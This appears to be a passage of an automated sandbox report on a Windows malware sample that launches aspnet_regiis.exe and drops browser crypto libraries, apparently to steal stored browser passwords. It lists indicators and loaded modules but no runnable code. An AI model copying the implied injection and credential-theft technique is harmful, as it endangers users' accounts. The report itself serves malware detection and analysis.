                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC829903_2_6CC82990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2C9A03_2_6CC2C9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5D9B03_2_6CC5D9B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4A9403_2_6CC4A940
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3D9603_2_6CC3D960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC7B9703_2_6CC7B970
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9B1703_2_6CC9B170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC68AC03_2_6CC68AC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC41AF03_2_6CC41AF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC6E2F03_2_6CC6E2F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9BA903_2_6CC9BA90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC222A03_2_6CC222A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC54AA03_2_6CC54AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3CAB03_2_6CC3CAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC92AB03_2_6CC92AB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC69A603_2_6CC69A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC953C83_2_6CC953C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2F3803_2_6CC2F380
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC253403_2_6CC25340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3C3703_2_6CC3C370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC6D3203_2_6CC6D320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD2ECD03_2_6CD2ECD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CCCECC03_2_6CCCECC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CCDAC603_2_6CCDAC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD96C003_2_6CD96C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CDAAC303_2_6CDAAC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE5CDC03_2_6CE5CDC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD66D903_2_6CD66D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CCD4DB03_2_6CCD4DB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CDFAD503_2_6CDFAD50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD9ED703_2_6CD9ED70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE58D203_2_6CE58D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CCDAEC03_2_6CCDAEC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD70EC03_2_6CD70EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD56E903_2_6CD56E90
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004104E7 appears 36 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CC5CBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CC694D0 appears 90 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6D75CF50 appears 33 times
                          Source: file.exeStatic PE information: invalid certificate
                          Source: file.exe, 00000000.00000002.1352729057.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: file.exe, 00000000.00000000.1331840866.00000000003E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHusbandPlayerQuinn178Jack.aUuLT vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameHusbandPlayerQuinn178Jack.aUuLT vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: 25W~Dos ZLIB complexity 1.0003326908957415
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/26@1/3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC87030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6CC87030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,3_2_00411807
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user~1\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000003.1737043353.0000000003266000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1724501799.000000000322A000.00000004.00000020.00020000.00000000.sdmp, JDGCGH.3.dr, HJKKFI.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: file.exeVirustotal: Detection: 27%
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntvdm64.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.ui.immersive.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47mrm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uianimation.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d10warp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2599259096.000000003A30F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
